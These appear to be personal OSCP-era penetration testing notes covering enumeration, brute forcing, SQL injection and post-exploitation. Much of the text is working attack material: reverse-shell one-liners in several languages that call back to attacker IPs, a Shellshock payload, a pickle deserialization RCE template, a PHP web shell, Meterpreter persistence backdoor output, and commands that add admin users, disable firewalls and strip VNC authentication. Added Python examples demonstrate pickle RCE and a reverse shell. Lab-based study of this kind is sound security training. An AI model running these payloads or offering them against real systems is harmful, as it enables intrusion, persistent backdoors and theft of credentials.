Malikashish8 Github Io Walkthrough Notes

Pentesting Notes

Methodology notes, essentially from OSCP days.


Methodology

Discover service versions of open ports using nmap or manually. nmap: use -p- for all ports. Also make sure to run a UDP scan with: nmap -sU -sV
Go for low hanging fruits by looking up exploits for the service versions found.
Enumerate every http/s port, not just 80/443:
  nikto -h
  dirbuster / wfuzz
  Burp
When searching for an exploit, search by CVE and by service name (try the generic product name when the exact version is not found).
For bruteforcing credentials the order is:
  1. Default credentials
  2. Easy - try simple passwords such as username, password, admin, previously found passwords etc., with discovered usernames or the default username. Also try these passwords for PE.
  3. Cewl wordlist
If you find an MD5 or some other hash, try to crack it quickly.
When source or a directory listing is available, check for credentials for things like the DB.
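The first methodology steps (take the service versions from nmap, look up exploits for them, then enumerate every open http/SMB/SNMP/SSH port) as an added Python example; it is not part of the original notes. It parses nmap's grepable (-oG) output, keeps only open ports, and derives the exploit-search terms (exact version first, then the generic product name) and the follow-up commands that the notes list for each service. The scan output embedded below is a constructed sample, not a real scan, and the follow-up command table is my own mapping of the notes' commands to service names.

```python
# Constructed sample of `nmap -sV -oG` (grepable) output; not a real scan.
# Fields are tab separated; each port entry is port/state/proto/owner/service/rpcinfo/version/
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated (constructed sample)\n"
    "Host: 10.11.1.5 ()\tStatus: Up\n"
    "Host: 10.11.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4/, "
    "80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, "
    "445/filtered/tcp//microsoft-ds///\tIgnored State: closed (996)\n"
    "Host: 10.11.1.8 ()\tPorts: 161/open|filtered/udp//snmp///, "
    "631/open/tcp//ipp//CUPS 1.4/\tIgnored State: closed (998)\n"
    "# Nmap done (constructed sample)\n"
)


def parse_gnmap(text):
    """Return (host, port, proto, state, service, version) for every port entry."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]
        for entry in fields["Ports"].split(", "):
            # nmap substitutes '|' for '/' inside these fields, so a plain split is safe
            port, state, proto, _owner, service, _rpc, version = entry.split("/")[:7]
            rows.append((host, int(port), proto, state, service, version))
    return rows


def open_services(text):
    """Only open (or UDP open|filtered) ports; filtered/closed are noise for exploit lookup."""
    return [r for r in parse_gnmap(text) if r[3].startswith("open")]


# Follow-up enumeration per service, taken from the commands in these notes
# (my own mapping of service name -> commands; {host}/{port} are filled in per row).
FOLLOWUPS = {
    "http": ["nikto -h http://{host}:{port}",
             "wfuzz/dirbuster against http://{host}:{port}/"],
    "ssh": ["hydra -l root -P /usr/share/wordlists/rockyou.txt {host} -s {port} ssh"],
    "netbios-ssn": ["enum4linux -a {host}", "smbclient -L {host} -U anonymous"],
    "microsoft-ds": ["nmap -p 139,445 --script=vuln {host}"],
    "snmp": ["snmp-check {host}", "snmpwalk -c public -v1 {host}"],
}


def exploit_search_terms(text):
    """Exact banner first, then the generic product name, as the notes suggest."""
    terms = []
    for _h, _p, _proto, _state, service, version in open_services(text):
        if version:
            terms.append(version)                          # exact: "OpenSSH 7.2p2 Ubuntu 4ubuntu2.4"
            terms.append(" ".join(version.split()[:2]))    # generic: "OpenSSH 7.2p2"
        else:
            terms.append(service)                          # no banner: fall back to the service name
    return list(dict.fromkeys(terms))                      # dedupe, keep order


def enumeration_plan(text):
    """One concrete follow-up command per open service, in scan order."""
    cmds = []
    for host, port, _proto, _state, service, _version in open_services(text):
        for tpl in FOLLOWUPS.get(service, []):
            cmds.append(tpl.format(host=host, port=port))
    return cmds


if __name__ == "__main__":
    for row in open_services(SAMPLE_GNMAP):
        print(row)
    for term in exploit_search_terms(SAMPLE_GNMAP):
        print("searchsploit", term)
    for cmd in enumeration_plan(SAMPLE_GNMAP):
        print(cmd)
```

Feed it a real file with `parse_gnmap(open("scan.gnmap").read())`; the UDP scan (nmap -sU -sV -oG) parses the same way, which is why open|filtered is kept as a candidate rather than dropped.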
Enum

netdiscover -r 10.11.1.0/24
OS fingerprint: xprobe2 10.11.1.133
nmap -sS -A -O -n -p1-65535 192.168.1.13
Dirbuster (with a long list)
Hydra https://host
Use Burp to analyze and edit traffic

SMB (139,445):
nbtscan -r 10.11.1.0/24
smbclient -L 10.11.1.31 -U anonymous
smbclient //192.168.25.67/wwwroot -U anonymous
enum4linux -a 10.11.1.5
/root/scripts/nmap-smb.sh 10.11.1.5
nmap -p 139,445 --script=vuln 10.11.1.1
rpcclient -U "" 10.11.1.1
SNMP (UDP 161)

snmp-check 10.11.1.5
onesixtyone -c community 192.168.186.130
snmpwalk -c public -v1 192.168.186.130
SMTP: nc to port 25 and then run VRFY bob

DNS Zone Transfer

Figure out the DNS servers: host -t ns foo.org ; host -t mx foo.org
Now attempt a zone transfer against each of the DNS servers: host -l foo.org ns1.foo.org
Complete enumeration: dnsenum foo.org
The following will attempt a zone transfer: dnsrecon -d megacorpone.com -t axfr

Vulnerability Scanning: nmap --script all <IP>

NFS

rpcinfo -p <IP>
showmount -e <IP>    (list the exports; showmount -a <IP> shows who has them mounted)
mount 10.11.1.10:/sites/webdata ./testing
HTTP

cewl www.megacorpone.com -m 6 -w mega-cewl.txt

Mangle:

john --wordlist=mega-cewl.txt --rules --stdout > mega-mangled

Locate db path:

/var/lib/mlocate/mlocate.db

hydra -l garry -F -P /usr/share/wordlists/rockyou.txt 10.11.1.73 -s 8080 http-post-form "/php/index.php:tg=login&referer=index.php&login=login&sAuthType=Ovidentia&nickname=^USER^&password=^PASS^&submit=Login:F=Failed:H=Cookie\: OV3176019645=a4u215fgf3tj8718i0b1rj7ia5"

-F stops after the first login is found
http-post-form "<url>:<post data>:F=<fail text>:H=<header>"    (F= is the string present in a failed login response; use S= for a success string instead)

hydra -l root -P /root/rockyou.txt 10.11.1.71 ssh
SQLMAP

sqlmap -u http://192.168.1.15:8008/unisxcudkqjydw/vulnbank/client/login.php --method POST --data "username=1&password=pass" -p "username,password" --cookie="PHPSESSID=crp8r4pq35vv0fm1l5td32q922" --dbms=MySQL --text-only --level=5 --risk=2

level ranges 1-5 and risk 1-3 (default 1)

Use the GET parameter and dump everything (-a):

sqlmap -u "http://192.168.203.134/imfadministrator/cms.php?pagename=upload" --cookie="PHPSESSID=1im32c1q8b54vr27eussjjp6n2" -p pagename --level=5 --risk=3 -a
msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.235 LPORT=1234 -f elf > reverse.elf
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.203.130 LPORT=1234 -f raw > shell.sh
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.235 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

From https://netsec.ws/?p=331
Linux

cut -c2-    drop the first character of each line (cut -c3- drops the first two)
rev: cat foo | rev    reverse the contents of each line
Python

Rev shell / buffer sender

import socket

buffer = "A" * 100   # assumed fuzz payload; size chosen for illustration
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.3.222', 6660))
s.send(("GET /" + buffer + " HTTP/1.1" + "\r\n\r\n").encode())
s.close()

Python eval() exploit (Python 2.7 input() also evaluates what it reads):

__import__("os").system("netstat -antp|nc 192.168.203.130 1234")
Deserialization (Pickle) exploit template

def create_command(cmd, args, flags):
    # Hand-written protocol-0 pickle. Opcodes: c = GLOBAL (subprocess.check_output),
    # ( = MARK, S = STRING, l = LIST (the argv list), t = TUPLE (the single argument
    # for REDUCE), R = REDUCE (calls check_output(argv)), . = STOP.
    # Exactly two MARKs are needed: the inner one closes the list, the outer one the
    # tuple. A third '(' leaves a stray mark and REDUCE fails with a stack underflow.
    template = """csubprocess
check_output
((S'{0}'
S'{1}'
S'{2}'
ltR."""
    return template.format(cmd, args, flags)

hack = create_command('ls', '..', '-la')
# On the target, pickle.loads(hack) (pickle.loads(hack.encode()) on Python 3) runs
# check_output(['ls', '..', '-la']).
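The pickle template above, generalised to any argv and exercised end to end, as an added example that is not code from the original notes: it builds the same protocol-0 byte stream, shows that a plain pickle.loads() executes the embedded command, and shows the hardened loader (an Unpickler whose find_class refuses every global) rejecting the same payload before anything runs. The command executed here is a benign stand-in (this interpreter printing a marker) rather than the notes' `ls .. -la`; a Linux/macOS host with `print` emitting a bare newline is assumed.

```python
import io
import pickle
import subprocess
import sys


def build_pickle_rce(argv):
    """Hand-build the protocol-0 pickle from the template above for any argv.
    Opcodes: c GLOBAL (subprocess.check_output), ( MARK, S STRING, l LIST,
    t TUPLE, R REDUCE (call check_output(argv)), . STOP.  Two MARKs: the inner
    one delimits the argv list, the outer one the one-element args tuple."""
    if not argv:
        raise ValueError("argv must not be empty")
    strings = "\n".join("S" + repr(a) for a in argv)   # repr() yields the quoted literal S expects
    return ("csubprocess\ncheck_output\n((" + strings + "\nltR.").encode()


def demo_payload():
    # Benign stand-in for the notes' ('ls', '..', '-la'): run this interpreter, print a marker.
    return build_pickle_rce([sys.executable, "-c", "print('pickled')"])


def vulnerable_loads(payload):
    """What an unguarded pickle.loads() sink does: resolves and calls the attacker's callable."""
    return pickle.loads(payload)


def safe_loads(payload):
    """Hardened counterpart: refuse every global lookup, so the c/GLOBAL opcode
    (and STACK_GLOBAL in newer protocols) can never resolve subprocess.check_output."""
    class NoGlobals(pickle.Unpickler):
        def find_class(self, module, name):
            raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))
    return NoGlobals(io.BytesIO(payload)).load()


def demo():
    """Returns the stdout of the command that ran purely because the bytes were unpickled."""
    return vulnerable_loads(demo_payload())


def demo_blocked():
    """True if the hardened loader rejects the same payload before anything executes."""
    try:
        safe_loads(demo_payload())
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print(demo_payload().decode())
    print(demo())
    print("blocked by safe_loads:", demo_blocked())
```

The defensive half is the point for anyone writing the server side: there is no safe way to pickle.loads() untrusted bytes, but a find_class that raises (or whitelists a handful of plain data classes) turns the c/GLOBAL step into a hard error instead of a command execution.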
Port knocking

for x in 27017 28017; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.11.1.237; done
Python script to read from a port (template)

#!/usr/bin/env python
import socket

IP = '10.11.1.8'
PORT = 631
MSG = open('a', 'rb').read()   # payload prepared beforehand in the file 'a'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
data1 = s.recv(1024)   # banner, if the service sends one
print(data1)
s.send(MSG)
data2 = s.recv(1024)   # response to our payload
print(data2)
s.close()
PHP

Convert an LFI into reading PHP source (php://filter base64-encodes the file instead of executing it):

http://10.11.1.24/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
http://10.11.1.24/classes/phpmailer/class.cs_phpmailer.php?classes_dir=php://filter/convert.base64-encode/resource=../../../../../var/www/image.php%00

The trailing %00 (null byte truncation) only works on PHP older than 5.3.4.
WordPress

wpscan --url http://192.168.110.181:69 --enumerate u    to enumerate users
wpscan -u 10.11.1.234 --wordlist /usr/share/wordlists/rockyou.txt --threads 50    to bruteforce users based on a wordlist
(old wpscan syntax; current wpscan uses --usernames / --passwords)
Samba Share

smbclient -L host
smbclient \\\\zimmerman\\public mypasswd
smbclient //billy/EricsSecretStuff -U anonymous
enum4linux -a 192.168.110.181    will do all sorts of enumeration on samba

From http://www.tldp.org/HOWTO/SMB-HOWTO-8.html

Crunch to generate a wordlist based on a pattern:

crunch 10 10 -t %%%qwerty^ > craven.txt
This creates a wordlist of exactly 10 characters: 3 digits (%), then the string 'qwerty', then one special character (^).
Chrome browser user agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Google bot: User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)

Find file type based on pattern when the 'file' command does not work: http://mark0.net/soft-tridnet-e.html
find /proc -regex '\/proc\/[0-9]+\/fd\/.*' -type l -lname "*network*" -printf "%p -> %l\n" 2> /dev/null

MySQL supports # for commenting on top of -- (the -- form needs a trailing space in MySQL; # does not)

Find text recursively in files in this folder:

grep -rnwl '/path/to/somewhere/' -e "pattern"

wpscan to scan a wordpress site for vulns:

wpscan --url https://192.168.1.13:12380/blogblog/ --enumerate uap
ShellShock over HTTP, when you get a response from cgi-bin that only has server info:

wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.235\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1" http://10.11.1.71/cgi-bin/admin.cgi

(The User-Agent value starts with "() {", so a vulnerable bash behind the CGI script parses it as a function definition and runs the trailing commands; the Content-type header and blank lines keep the web server from returning a 500 before the shell connects back.)
Bruteforce

Use fcrackzip to brute force zip files.

cewl http://10.11.1.39/otrs/installer.pl >> cewl
mangle with john (--rules --stdout, see Mangle above)
sort cewl | uniq >> cewl2

Check cert (hostnames and e-mail addresses in the certificate are vhost and username candidates):

openssl s_client -connect 10.11.1.35:443
Password Cracking

Wordpress password crack - https://github.com/micahflee/phpass_crack - see .251

cat /usr/share/wordlists/rockyou.txt | python /root/labs/251/phpass_crack-master/phpass_crack.py pass.txt -v

It seems john does a better job at PHP (phpass)  password cracking when using a wordlist: john --wordlist=/root/rockyou.txt pass.txt

echo 'gibs@noobcomp.com:$P$BR2C9dzs2au72.4cNZfJPC.iV8Ppj41' > pass.txt    (single quotes, or the shell expands $P and $BR2C9dzs2au72)
Encoding

Hex to ASCII:

echo -n 666c6167307b7468655f717569657465 | xxd -r -p

Convert a windows file to linux line endings:

cat file | dos2unix > file2

base64 -d

PUT to a webserver: use Poster (Ctrl+Alt+P in Firefox), set the URL containing the file path, choose the file and PUT.

zip all files in this folder: zip -r zipped.zip .

Convert .py to .exe with pyinstaller: "C:\Program Files\Python27\python.exe" "C:\Program Files\Python27\Scripts\pyinstaller-script.py" code.py
Rev Shell

From http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.11.0.235/443 0>&1

PERL

Here's a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="10.11.0.235";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.235",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Windows:

python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.235',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\\WINDOWS\\system32\\cmd.exe','-i']);"

(Caveat: on Windows CPython os.dup2() does not accept a socket's fileno(), and cmd.exe has no -i switch; a Windows variant has to pump the socket into cmd.exe's stdin/stdout pipes instead.)

PHP

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn't work, try 4, 5, 6...

php -r '$sock=fsockopen("10.11.0.235",443);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems and even if it is there are several versions of netcat, some of which don't support the -e option.

nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

[Untested submission from anonymous reader]

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 - which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1
You'll need to authorise the target to connect to you (command also run on your host): xhost +targetip

PHP web shell

<pre><?php echo shell_exec($_GET['c']);?><pre/>
In base64: PHByZT48P3BocCBlY2hvIHNoZWxsX2V4ZWMoJF9HRVRbJ2MnXSk7Pz48cHJlLz4K

cmd.exe >& /dev/tcp/10.11.0.235/80 0>&1
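What the Python and bash one-liners above actually do, as an added loopback demonstration that is not code from the original notes or from pentestmonkey: one thread plays the catcher (in practice `nc -nlvp <port>` or exploit/multi/handler), the other plays the victim and hands the connected socket to /bin/sh as stdin, stdout and stderr, which is exactly what the three os.dup2() calls achieve. Everything stays on 127.0.0.1 on an ephemeral port, the shell is started without -i so there is no prompt noise, and the catcher sends one command then closes its write side so the shell exits cleanly. A POSIX host with /bin/sh is assumed.

```python
import socket
import subprocess
import threading


def catcher(listener, command, result):
    """Attacker side: accept the connect-back, send a command, collect everything until EOF."""
    conn, _peer = listener.accept()
    conn.settimeout(10)
    conn.sendall(command.encode())
    conn.shutdown(socket.SHUT_WR)        # EOF on the shell's stdin once the command is sent
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:                     # shell exited and the victim closed its socket
            break
        chunks.append(data)
    conn.close()
    result.append(b"".join(chunks).decode())


def victim(host, port, shell):
    """The one-liner spelled out: connect back, then run the shell with the socket
    as fd 0, 1 and 2 (subprocess performs the dup2() that the one-liner does by hand)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    fd = s.fileno()
    subprocess.call([shell], stdin=fd, stdout=fd, stderr=fd)
    s.close()


def reverse_shell_roundtrip(command="echo reverse-ok\n", shell="/bin/sh"):
    """Run catcher and victim against each other on loopback; return what the catcher saw."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # loopback only, ephemeral port
    listener.listen(1)
    listener.settimeout(10)
    port = listener.getsockname()[1]
    result = []
    t = threading.Thread(target=catcher, args=(listener, command, result))
    t.start()
    victim("127.0.0.1", port, shell)
    t.join(15)
    listener.close()
    return result[0] if result else None


if __name__ == "__main__":
    print(repr(reverse_shell_roundtrip()))
```

The same structure explains the mkfifo trick for netcat builds without -e: there the fifo plus the `cat | sh | nc` pipeline stands in for the dup2() calls, wiring the socket to the shell's descriptors through pipes instead.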

Metasploit

msfconsole

use exploit/name            # select exploit
set PAYLOAD payload/name    # select payload
show options                # show options for the selected exploit and payload
exploit                     # start the exploit
sessions                    # list sessions
sessions -i 2               # interact with session number 2
# Ctrl+Z - send the session to the background

Meterpreter

sysinfo      # display info
getuid
getsystem    # windows only

POST

meterpreter > load mimikatz    (the mimikatz extension has since been replaced by kiwi: load kiwi)
help mimikatz
Msfvenom

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.235 LPORT=1234 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le > shell
msfvenom -p windows/shell_bind_tcp -f exe > labs/31/shell.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.235 LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le >
msfvenom -p windows/shell_reverse_tcp -f asp LHOST=10.11.0.235 LPORT=443 -o labs/229/shell.asp

root@kali:~/labs/237/davfs# msfvenom --help-platforms
Platforms (--platform)
aix, android, bsd, bsdi, cisco, firefox, freebsd, hpux, irix, java, javascript, linux, mainframe, netbsd, netware, nod

root@kali:~/labs/237/davfs# msfvenom --help-formats
Executable formats (-f)
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, ms
Transform formats (-f)
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vb

Meterpreter Handler:

msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp    (or: set payload linux/x86/meterpreter/reverse_tcp)
msf exploit(handler) > set LHOST <Listening_IP>    (for example set LHOST 192.168.5.55)
msf exploit(handler) > set LPORT <Listening_Port>  (for example set LPORT 4444)
msf exploit(handler) > exploit -z
Reverse Shells (partial msfvenom -l payloads listing; the right-hand column of the original was cut off):

set payload <one of>:

linux/armbe/shell_bind_tcp
linux/armle/{exec, mettle/bind_tcp, mettle/reverse_tcp, shell/bind_tcp, shell/reverse_tcp, shell_bind_tcp, shell_reverse_tcp}
linux/mipsbe/{exec, mettle/reverse_tcp, reboot, shell/reverse_tcp, shell_bind_tcp, shell_reverse_tcp}
linux/mipsle/{exec, mettle/reverse_tcp, reboot, shell/reverse_tcp, shell_bind_tcp, shell_reverse_tcp}
linux/ppc/{shell_bind_tcp, shell_reverse_tcp}
linux/ppc64/{shell_bind_tcp, shell_reverse_tcp}
linux/x64/{exec, mettle/bind_tcp, mettle/reverse_tcp, shell/bind_tcp, shell/reverse_tcp, shell_bind_tcp, shell_bind_tcp_random_port, shell_reverse_tcp}
linux/x86/{chmod, exec, meterpreter/bind_ipv6_tcp, meterpreter/bind_ipv6_tcp_uuid, meterpreter/bind_nonx_tcp, meterpreter/bind_tcp, meterpreter/bind_tcp_uuid, meterpreter/reverse_ipv6_tcp, meterpreter/reverse_nonx_tcp, meterpreter/reverse_tcp, meterpreter/reverse_tcp_uuid, metsvc_bind_tcp, metsvc_reverse_tcp, mettle/bind_ipv6_tcp, ...}    (remaining linux/ entries cut off in the original)

windows/dllinject/{bind_hidden_ipknock_tcp, bind_hidden_tcp, bind_ipv6_tcp, bind_ipv6_tcp_uuid, bind_nonx_tcp, bind_tcp, bind_tcp_rc4, bind_tcp_uuid, reverse_hop_http, reverse_http, reverse_http_proxy_pstore, reverse_ipv6_tcp, reverse_nonx_tcp, reverse_ord_tcp, reverse_tcp, reverse_tcp_allports, reverse_tcp_dns, reverse_tcp_rc4, reverse_tcp_rc4_dns, reverse_tcp_uuid, reverse_winhttp}
windows/{dns_txt_query_exec, download_exec, exec, loadlibrary, messagebox}
windows/meterpreter/{bind_hidden_ipknock_tcp, bind_hidden_tcp, bind_ipv6_tcp, bind_ipv6_tcp_uuid, bind_nonx_tcp, bind_tcp, bind_tcp_rc4, bind_tcp_uuid, reverse_hop_http, reverse_http, reverse_http_proxy_pstore, reverse_https, reverse_https_proxy, reverse_ipv6_tcp, reverse_nonx_tcp, reverse_ord_tcp, reverse_tcp, reverse_tcp_allports, reverse_tcp_dns, reverse_tcp_rc4, reverse_tcp_rc4_dns, reverse_tcp_uuid, reverse_winhttp, reverse_winhttps}
windows/{meterpreter_bind_tcp, meterpreter_reverse_http, meterpreter_reverse_https, meterpreter_reverse_ipv6_tcp, meterpreter_reverse_tcp, metsvc_bind_tcp, metsvc_reverse_tcp}
windows/patchupdllinject/{bind_hidden_ipknock_tcp, bind_hidden_tcp, bind_ipv6_tcp, bind_ipv6_tcp_uuid, bind_nonx_tcp, bind_tcp, bind_tcp_rc4, bind_tcp_uuid, reverse_ipv6_tcp, reverse_nonx_tcp, reverse_ord_tcp, reverse_tcp, reverse_tcp_allports, reverse_tcp_dns, reverse_tcp_rc4, reverse_tcp_rc4_dns, reverse_tcp_uuid}
windows/patchupmeterpreter/{bind_hidden_ipknock_tcp, bind_hidden_tcp, bind_ipv6_tcp, bind_ipv6_tcp_uuid, bind_nonx_tcp, bind_tcp, bind_tcp_rc4, bind_tcp_uuid, reverse_ipv6_tcp, reverse_nonx_tcp, reverse_ord_tcp, reverse_tcp, reverse_tcp_allports, reverse_tcp_dns, reverse_tcp_rc4, reverse_tcp_rc4_dns, reverse_tcp_uuid}
windows/{powershell_bind_tcp, powershell_reverse_tcp}
windows/shell/{bind_hidden_ipknock_tcp, bind_hidden_tcp, bind_ipv6_tcp, bind_ipv6_tcp_uuid, bind_nonx_tcp, bind_tcp, bind_tcp_rc4, bind_tcp_uuid, reverse_ipv6_tcp, reverse_nonx_tcp, reverse_ord_tcp, reverse_tcp, reverse_tcp_allports, reverse_tcp_dns, reverse_tcp_rc4, reverse_tcp_rc4_dns, reverse_tcp_uuid}
windows/{shell_bind_tcp, shell_bind_tcp_xpfw, shell_hidden_bind_tcp, shell_reverse_tcp, speak_pwned}
windows/upexec/{bind_hidden_ipknock_tcp, bind_hidden_tcp, bind_ipv6_tcp, bind_ipv6_tcp_uuid, bind_nonx_tcp, bind_tcp, bind_tcp_rc4, bind_tcp_uuid, reverse_ipv6_tcp, reverse_nonx_tcp, reverse_ord_tcp, reverse_tcp, reverse_tcp_allports, ...}    (remaining entries cut off in the original)

bsd/sparc/{shell_bind_tcp, shell_reverse_tcp}
bsd/x64/{exec, shell_bind_ipv6_tcp, shell_bind_tcp, shell_bind_tcp_small, shell_reverse_ipv6_tcp, shell_reverse_tcp}
bsd/x86/{exec, metsvc_bind_tcp, ...}    (remaining bsd/ entries cut off in the original)
Persistence

meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

  -A        Automatically start a matching exploit/multi/handler to connect to the agent
  -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
  -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
  -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
  -T <opt>  Alternate executable template to use
  -U        Automatically start the agent when the User logs on
  -X        Automatically start the agent when the system boots
  -h        This help menu
  -i <opt>  The interval in seconds between each connection attempt
  -p <opt>  The port on which the system running Metasploit is listening
  -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -A -L C:\\ -X -U -i 10 -r 10.11.0.235 -p 4910
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DJ_20170216.2235/DJ_20170216.2235.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.11.0.235 LPORT=4910
[*] Persistent agent script is 99650 bytes long
[+] Persistent Script written to C:\\pGjIiHMHVx.vbs
[*] Starting connection handler at port 4910 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\\pGjIiHMHVx.vbs
[+] Agent executed with PID 1504
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU

Clean up afterwards with the resource file printed above (msfconsole: resource <file>), which removes the .vbs and the HKCU Run key. The persistence meterpreter script is deprecated in current Metasploit in favour of post/windows/manage/persistence_exe.
Windows

whoami
net users
systeminfo
net user <bob>
set
echo %USERDOMAIN%/%USERNAME%

Run a powershell command: powershell -ExecutionPolicy Bypass -NoLogo -NoProfile -Command "dir"

Run a local smb server to copy files to windows hosts easily:

1. copy files to /root/smb/
2. service smb start
3. copy \\10.11.0.235\file.exe .    # on the windows target (a UNC path needs the share name: \\10.11.0.235\<share>\file.exe)

Add user

run getgui -u myadmin -p Pass1234
net user myadmin Pass1234 /add
net localgroup Administrators myadmin /add
rdesktop -u myadmin -p Pass1234 10.11.1.218 -g 80%

Run as: psexec -u alice -p alicei123 C:\HFS\shellm80c.exe

SAM: the three locations of the SAM\hashes are:

%systemroot%\system32\config - c:\Windows\System32\Config\
%systemroot%\repair (but only if rdisk has been run) - C:\Windows\Repair
In the registry under HKEY_LOCAL_MACHINE\SAM

Use pwdump3 to extract hashes from these and run john:

samdump2 system SAM -o hashes.txt
john hashes.txt

nmap -sV --script=rdp-vuln-ms12-020 -p 3389 10.11.1.5

meterpreter > run post/multi/recon/local_exploit_suggester

Firewall: XP: netsh firewall set opmode mode=DISABLE    Newer: netsh advfirewall set allprofiles state off

RDP:

run getgui -u myuser -p mypass
rdesktop -u myuser -p mypass 10.11.1.226 -g 90%

Lookup the windows version from the product version of C:\Windows\explorer.exe: http://www.geoffchappell.com/studies/windows/shell/explorer/history/index.htm
https://support.microsoft.com/en-us/help/969393/information-about-internet-explorer-versions

PE (switch from admin user to NT Authority\System): psexec.exe -s cmd

post/windows/gather/credentials/gpp    Meterpreter: search GPP (Group Policy Preferences) for cpassword

Windows Exploit Suggester

Compile: i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe

TFTP

atftpd --daemon --port 69 `pwd`
tftp -i 10.11.0.235 get shellM.exe    # on the windows target
VNC - RealVNC4

meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4 -v SecurityTypes -d None
Successfully set SecurityTypes of REG_SZ.

(Also try HKCU\Software\RealVNC\WinVNC4\SecurityTypes if the above does not work)

SMB

service smbd start    /root/smb is shared
Mount using: net use z: \\10.11.0.235\oscp\

nbtscan -r 10.11.1.0/24
enum4linux -a 10.11.1.5
root@kali:~# nmblookup -A 10.11.1.136
smbclient -L \\host -I 10.11.1.136 -N
smbclient //host/Bob\ Share -I 10.11.1.136 -N
MsSQL

https://www.iodigitalsec.com/2013/08/10/accessing-and-hacking-mssql-from-backtrack-linux/

sqsh -S 10.11.1.31 -U sa -P poiuytrewq -D bankdb

vi ~/.sqshrc
\set username=sa
